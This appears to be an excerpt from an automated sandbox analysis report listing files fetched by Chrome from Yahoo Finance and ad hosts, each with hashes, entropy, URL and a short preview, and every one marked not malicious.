                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:H69mc4sl3O4Ut8vHhKWJ3S4S1UpMhni6jUs8sh6BqZ/T7:a1PXhLJ3St1Uihni6jUs8bQ7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:79AD25421677DDAAF4639B7CFFF2F1FC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:22BE49015F2FA06DBE120F9414F15D43BCD517C2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4FCD7D21A472CDC63BE194878AF3066788B8D6D476200D0CC6C9DFBFE0DFCD1C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8B509315FA5D2F636932E2B2F1095900417A3C26B2F0317CD71EA995288E9311A83B3BFEDE7FA7D2C51B456F97DD9FEFDC3B8223184ECA502F91DB2EEF005668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/search.D1DBxgNd.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27A6.47 6.47 0 0 0 16 9.5 6.5 6.5 0 1 0 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14"/></svg>';export{s as default};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1569)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1570
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.263643110751404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:3XLCd7Eb0s2AsG9Z4ebZTPG9b9+ZFSnoEncaA:3X675s2AsGHt4gSnoEcaA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D38FB9D4E5D37A47AEFE9CBF4DA98B2B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:077568569A35E788F4C6DADD84BD231DF5771D6D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7462151FE63ECF05F4CDB06A3C8B0CD2749F2EDEECDABD8845487B3E1649C631
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5341225F6F46784066AD691AAF388111B7AF6D2B7D3C27F1936FCEBF018305A544525B7FD2BD67285AE829E1A24FE39BA508C4A9BDC834CA3B0EBE71AB2E3BEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/InfiniteScroll.B0InYP9n.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as w,e as y,d as C,f as D,i as H,k as I,n as d,P as T,I as W,Q as b}from"./scheduler.Dsuh-FKt.js";import{S as q,i as v}from"./index.CvwOawEI.js";function z(s){let t;return{c(){t=y("li")},l(i){t=C(i,"LI",{}),D(t).forEach(H)},m(i,l){I(i,t,l),s[6](t)},p:d,i:d,o:d,d(i){i&&H(t),s[6](null)}}}function x(s,t,i){let{threshold:l=0}=t,{elementScroll:r=void 0}=t,{hasMore:a=!0}=t,{useWindow:c=!1}=t,{isLoading:h}=t;const u=T();let o;function f(e){var g,m,S;if(h)return;const n=c?e.target.documentElement||((g=e.target.document)==null?void 0:g.documentElement):e.target;if(n){const L=(m=n.querySelector(".layoutContainer .mainContainer"))==null?void 0:m.offsetHeight,E=(S=n.querySelector(".layoutContainer > .right .dock"))==null?void 0:S.offsetHeight,_=n.scrollHeight-n.clientHeight-n.scrollTop;if(E>L){const k=E-L;n.scrollHeight-k-n.clientHeight-n.scrollTop<=l&&a&&u("loadMore")}else _<=l&&a&&u("loadMore")}}W(()=>{let e;return(o||r||c)&&(e=c?window:r||(o==null?void 0:o.parentNode),e==null||e.addEve
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):270
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.881247785412739
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:H69mc4sl3O48MV4Gunk1r2UVJrLxIIcIdWR74dGwn:a1P8Mnunk1rDJIfIdWRsb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2E1F893D4F7033B24FDD21B149EDB5BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5BC96655CD5FC72FC0748BC4644E8C3A5DE6A632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7D15DDFC2FD91F4AADE91775433DC2A7F72E7F239103F5B725EDF575CB8E1B5E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D44D73780A3485B11E00CE1A1888CD3A56763F97F60F1AEB8A1A23177F6BF6522C13FAF2F0E89925E0CE77E20A5809949F3A738E6E80AC9F6DB24879EB35108A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/error_outline.CkdKfkE_.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M11 15h2v2h-2zm0-8h2v6h-2zm.99-5C6.47 2 2 6.48 2 12s4.47 10 9.99 10C17.52 22 22 17.52 22 12S17.52 2 11.99 2M12 20c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8"/></svg>';export{s as E};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5257351171929923
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUEIHh/:i4/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:13E1C7A2184E36D7AE519E99B1AA226F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:355CCAD4EAC39838E1CC76FD0B670FD2EA1E5AA3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:48A33CA9F42B91902D57AD8AC52E1CE32B92C8C10C732F2DBB6FE960EBFD9438
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B1A6CFA7B21DBB0B281D241AF609F3BA7F3A63E5668095BBA912BF7CFD7F0320BAF7C3B0BFABD0F8609448F39902BAEB145BA7A2D8177FE22A6FCEA03DD29BE1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.06923567775942
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YEOBHKfQZywXK0om4:YEOBeQHK0om4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8A6684396EEA6A643701D3DFDE84FB64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C1B7A8BEB17FDCECBC23B629F92C98A3C684035D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:94B61DAE039338813DC95B5512B1EA7EDE3E8C128AB052303E3C2EB15FA4BA17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0A8DFE621109C853B433DD07A239FCB500EAB2DBB5E89B2D049CCE1010DE1FE632AEFA28C5F1E7F7EA4F0EF2FF574CA8B678FC891C49AEF5AA69B32A95E72100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"axid": "y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.142069457963608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CU1urkltxlHh/:gg/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DB04C7B378CB2DB912C3BA8A5A774EE3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DEE34BD86C3484D31002182AA2B7CAA4699126B8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:98B3D9D20E032F90ACA49E9B116225D539FF6FBDB7E42C3C363F63896AC03D2A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:826225FC21717D8861A05B9D2F959539AAD2D2B131B2AFED75D88FBCA535E1B0D5A0DA8AC69713A0876A0D467848A37A0A7F926AEAFAD8CF28201382D16466AB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://core.iprom.net/cookiesync?gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):159
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.878987657706172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YWVKnSSKZPQSTRfZ5QSQcPZSwSEYLZSpGGOh1py2fmQMRonoIRfkKfbfqpC:YWUnMCSTHySBltGtG01U4VMOnRRfkKTV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C5E223895079F809E7825A832B0F910C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C599BDD260F18E58B0C1082D355DBBB619C3773F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:05D2821EB3CEB9832858FCED570939B0472D5D47BB63BFAD574BE885CDF3C66F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A62DEA35304E5E2E9042668C27FD7022DAF17BC3DFAB1ED1172EA45DE662E2EC09A795AFA8304A44A223CCCD654105890B8B2159BFF362B773EFE59169EA25DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"spot_ab":"773:B|767:A|764:B|761:A|759:B|758:B|754:A|752:B|751:A|67:B|602:A|601:A|600:A|56:A|55:A|51:A|48:A|47:B|46:A|37:B|35:B|34:C|33:A|32:B|101:B|100:B|"}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (6179), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):6179
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.08247511424115
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:Ma6NSahE4cG2vzIqRtQrzIqRtQda6NSahE4cG28:2LezoziLP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:14B81B9D43CC8EB81AE45EEBBAAE258C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:282B11AB55C5F5160364E8EFC58D7F1F905F18FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C4785A51ADADEF034B8274F06CD3BA259F313F67269F1C8F06BB9CE88AE9137A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E50862DC3483065FBF5E9F41C8F5422229A873248B5E138D27ECC6B76B53D901EF82307C0F4237B9FB9966251EB8A54E582361C70DAF0CF9BB0E39BA82FDD190
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/cprops/colors_1.1.27.min.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview::root,html[data-color-scheme=dark] [data-maintain-color],html[data-color-theme-enabled] [data-color-scheme=light],html[data-color-theme-enabled][data-color-scheme=light]{--barbie:#f80e5d;--barney:#cc008c;--batcave:#232a31;--battleship:#5b636a;--black:#000;--blurple:#5d5eff;--bob:#b0b9c1;--bonsai:#00873c;--canary:#ffde00;--carrot-juice:#ff520d;--charcoal:#464e56;--cheetos:#ff6e0c;--cobalt:#003abc;--denim:#1a0dab;--dirty-seagull:#e0e4e9;--dolphin:#6e7780;--dory:#0f69ff;--gandalf:#979ea8;--grape-jelly:#6001d2;--grey-hair:#f0f3f5;--hendrix:#f8f4ff;--hulk-pants:#7e1fff;--inkwell:#1d2228;--kiwi:#00d15e;--malbec:#39007d;--malibu:#ff0080;--marshmallow:#f5f8fa;--masala:#ff8b12;--midnight:#101518;--mimosa:#ffd333;--mulah:#1ac567;--mulberry:#5015B0;--ninja-turtle:#00ab5e;--pebble:#c7cdd2;--peeps:#7dcbff;--playdoh:#21d87d;--ramones:#2c363f;--sapphire:#2f0060;--scooter:#0063eb;--sea-foam:#11d3cd;--shark:#828a93;--sky:#12a9ff;--smurfette:#188fff;--solo-cup:#eb0f29;--spirulina:#009c94;--starfish:#775
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (42749)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):96840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4845271612727995
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:28H+8OwWGr4nicx4+X7oT+nRgQw+TwyD4rCiht7M:28HGwWGsFXE6gvPhtA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6DC3CB48CC6628FDA236043496215404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:B862993A8B9DF28D47A7FDFCE9C98D25DF4DF35E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:654314DAA157C59FC5694FC92385BEA61702CC5FE278C4AAE8559698DB13D0B1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E13D9910890AE8600BF25B8494DBDE4F86F9CAA47BF083034059760833059859493AE119EF010378B7AF641D1B73C957FC9E9F8D6345CD4F1ABDF5C787184D81
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var Oc=Object.create;var gi=Object.defineProperty;var Ac=Object.getOwnPropertyDescriptor;var Ic=Object.getOwnPropertyNames;var xc=Object.getPrototypeOf,Rc=Object.prototype.hasOwnProperty;var p=(e,r)=>()=>(r||e((r={exports:{}}).exports,r),r.exports);var kc=(e,r,n,s)=>{if(r&&typeof r=="object"||typeof r=="function")for(let d of Ic(r))!Rc.call(e,d)&&d!==n&&gi(e,d,{get:()=>r[d],enumerable:!(s=Ac(r,d))||s.enumerable});return e};var Fe=(e,r,n)=>(n=e!=null?Oc(xc(e)):{},kc(r||!e||!e.__esModule?gi(n,"default",{value:e,enumerable:!0}):n,e));var fe=p((qt,mi)=>{"use strict";var dr=function(e){return e&&e.Math===Math&&e};mi.exports=dr(typeof globalThis=="object"&&globalThis)||dr(typeof window=="object"&&window)||dr(typeof self=="object"&&self)||dr(typeof global=="object"&&global)||dr(typeof qt=="object"&&qt)||function(){return this}()||Function("return this")()});var se=p((Ty,yi)=>{"use strict";yi.exports=function(e){try{return!!e()}catch{return!0}}});var ge=p((qy,bi)=>{"use strict";var Pc=se();bi.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15980
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.524595476946456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:DO08El2EQpEJEHaEpYbEr5KE5brEXXVE5mUEbpvA1CEyEnEapE9pEgpE7pEu1:DO08El2EQpEJE6EgE4E1E1EHE8CEyEnH
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:78A4B12F4283585B160E86CDEC381FD0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:439156992CAF256DF0D669BE221CC0000D384447
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:ED92D1461F85410BD09556D85507E6F38DC85D2D200D7AED50F60C6C108508C8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7B285F76AF8E56F73338089AAED01CE0B5EC06B09EA6627FD48659A39B281005098992E47F01B69C76F7B602F82BC0CB409A74EFF1F97DB227706FAD990EE7CD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"assets":{"css":[{"location":"top","value":"/aaq/cprops/colors_1.1.27.min.css","name":"custom-properties","version":"1.1.27"},{"location":"top","value":"/aaq/fp/css/react-wafer-games.GamesMini.atomic.ltr.be03a375386175922f163856820e511b.min.css","name":"react-wafer-games.GamesMini.atomic"},{"location":"top","value":"/aaq/fp/css/react-wafer-games.games-mini.cdd5050ba6288df47182412e30e482a4.css","name":"react-wafer-games.games-mini"}],"js":[{"location":"bottom","value":"/aaq/wf/wf-core-1.65.1-modern.js","name":"wafer-core","version":"1.65.1"},{"location":"bottom","value":"/aaq/wf/wf-fetch-1.19.1-modern.js","name":"wafer-fetch","version":"1.19.1"},{"location":"bottom","value":"/aaq/wf/wf-tabs-1.12.6-modern.js","name":"wafer-tabs","version":"1.12.6"},{"location":"bottom","value":"/aaq/wf/wf-scrollview-2.23.3-modern.js","name":"wafer-scrollview","version":"2.23.3"},{"location":"bottom","value":"/aaq/wf/wf-image-1.4.0-modern.js","name":"wafer-image","version":"1.4.0"},{"location":"bottom","
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (10913), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):10913
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.254821090865018
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:FGUAMQ23qSDZJQD3BLcevTbUQUuUSUh6Cle/pnttCLkqFj0:MU1QXnDxLtfhU8/EupOgqh0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:336B804960F2D2E05B7372CFCF7CA6F7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EDDC49C133EC21645B2AE1FB0D269856A1821449
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B4235ED7DE3D5310BF6EAF35A3F5672AD57453D2AADC627AE0EC66016450D5F8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7EFF7E0255E665E4766961596F1CCC27FAF04D6D18435CD44AFD8A7F1811954D9C267B9CC19CCB737639FCE28ED40E5D61F7EC264BFDCF812A003D32B79416AB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://assets.a-mo.net/js/cframe.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(()=>{function r(r){return void 0===r?{b:0}:null!==r&&void 0!==r.b?{b:r.b+1|0}:r}function n(n){return null==n?void 0:r(n)}function e(r){if(null===r||void 0===r.b)return r;var n=r.b;return 0===n?void 0:{b:n-1|0}}function t(n,t){if(void 0!==n)return r(t(e(n)))}function i(r,n){if(void 0!==r)return n(e(r))}function a(r,n){return void 0!==r?e(r):n}function o(r,n){return void 0!==r?r:n}function u(r){return void 0!==r}var v=new Map;function d(r){var n,e=v.get(r);if(void 0!==e){var t=e+1|0;v.set(r,t),n=t}else v.set(r,1),n=1;return r+"/"+n}function c(r,n){return r.catch((r=>{return n((r=>null!=r&&"string"==typeof r.a)(e=r)?e:{a:"0j",o:e});var e}))}function f(r){return Promise.resolve(r)}function s(r,n){return r.then((r=>Promise.resolve(n(r))))}function m(r){return r.then((r=>Promise.resolve()))}var l=window,p=document;function w(r){return c(m(r),(r=>(((r,n)=>{var e=l.parent;null==e||e.postMessage({u:"/a/e",e:n+""},"*")})(0,r),Promise.resolve())))}function g(n){if(""!==n)try{return r(new URL(n))
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (7124)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7125
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.391179178324277
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:YRLQUo8LMDByXcYtx5VWHOM8oSOwsHL0UBjN9UnVX3sO8M:c8Uo8LMkXcYrjkhgUTuVX8rM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E254D88D959266344C9798EF102E2626
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:30B895D29B8E4187ADF76483FCEDE10258A1F0EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2B1A809EF975E2C68DEF307B461786AAA9514B7E42165B318EAA2E25DC3B359C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0631F3A4AC69ACBEF026D935CD0A25CDC9FD6B37FA8349D78E87FB22E05CAFAEFDE462247292AB4BB1C67B567CD1B024D93B2B29FADDE8747ACC17BFEE0F9837
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as x,b as y,e as z,j as E,d as S,f as w,i as b,q as v,L as D,k as L,l as B,x as ee,a5 as le,H as te,p,z as ie,t as H,h as q,m as C,n as T,c as ne,u as ae,g as se,a as fe,K as F}from"./scheduler.Dsuh-FKt.js";import{S as oe,i as re,t as k,g as N,a as g,e as M,c as V,b as j,m as K,d as O}from"./index.CvwOawEI.js";import{e as G}from"./each.CI2tb2RB.js";import{c as J,g as Q}from"./seoUtil.BURv1pYY.js";import{I as ce}from"./Icon.C8w5V9EK.js";import{L as ue}from"./chevron_left.CltsmSmq.js";import{L as $}from"./Link.vSNQugO0.js";function R(s,e,l){const t=s.slice();t[14]=e[l],t[17]=l;const i=t[17]===t[0].length-1;return t[15]=i,t}function P(s){const e=s.slice(),l=e[0][e[0].length-2];return e[18]=l.href,e[19]=l.i13n,e[20]=l.title,e}function U(s){let e,l=J(Q(s[0]))+"",t;return{c(){e=new te(!1),t=p(),this.h()},l(i){e=ie(i,!1),t=p(),this.h()},h(){e.a=t},m(i,a){e.m(l,i,a),L(i,t,a)},p(i,a){a&1&&l!==(l=J(Q(i[0]))+"")&&e.p(l)},d(i){i&&(b(t),e.d())}}}function W(s){let e,l;return e=new ce({props
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (55201), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):55201
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.402742992612217
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:Xr4MuUUXPgSKUUJcConr/m8b6442RZTeKc8o:7cX6Uvw2RZTeDT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1373A6D9D7D4C547326572BF62610656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4D55756AB17C6DB24AC089687DF5F4F5668F8721
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5A342906865F8FEEE1DFDD0132EE45310D87E4138661797F20CAAE3C049370E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:47D602F1F860A672ACB0D76EC1D102D75FE5AA89C5599CC6BD69CF3BD4F2C804ED5CC75CF59C538BFCC84D40DD937C51161CF771B75A67949849D278BA4D4FB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://jac.yahoosandbox.com/2.0.0/jac.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! JAC 2.0.0, Copyright 2018-2023 Yahoo Inc. */(()=>{"use strict";const e=class{constructor(e,t={}){this.type=e,this.meta=t,this.target=null}};class t extends e{static SCROLL="page.scroll";static RESIZE="page.resize";static VISIBILITY="page.visibility";static FOCUS="window.focus";static BLUR="window.blur";static FOCUS_IN="window.focus_in";static BLUR_CAPTURE="window.blur_capture";static DOM_LOADED="dom.loaded";static LOADED="page.loaded";static BEFORE_UNLOAD="page.stopped";static MOUSE_OVER="page.mouse_over";static MOUSE_OUT="page.mouse_out"}const i={addDOMLoadListener:function(e){if("loading"!==document.readyState)return e();document.addEventListener("DOMContentLoaded",e,!1)},addPageLoadListener:function(e){if("complete"===document.readyState)return e();window.addEventListener("load",e,!1)}};function s(e,t,i=this){let s=null,n=null;const o=()=>{e.apply(i,n),s=null};return(...e)=>{s||(n=e,s=setTimeout(o,t))}}function n(e,t){if(Array.isArray(t)){if(t.includes(e))return!0}else for(let i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x156, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):18656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.8016755112011325
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:H6npvsCMrYNg7b9Se/mG8lmRZHDjdZC1FEIhZnHnsHF47mRf3DUSDKHG:opEbYy/QomORZq1+Izf7+fTURm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F397467FE35A0939C3068AB3D8E809BB
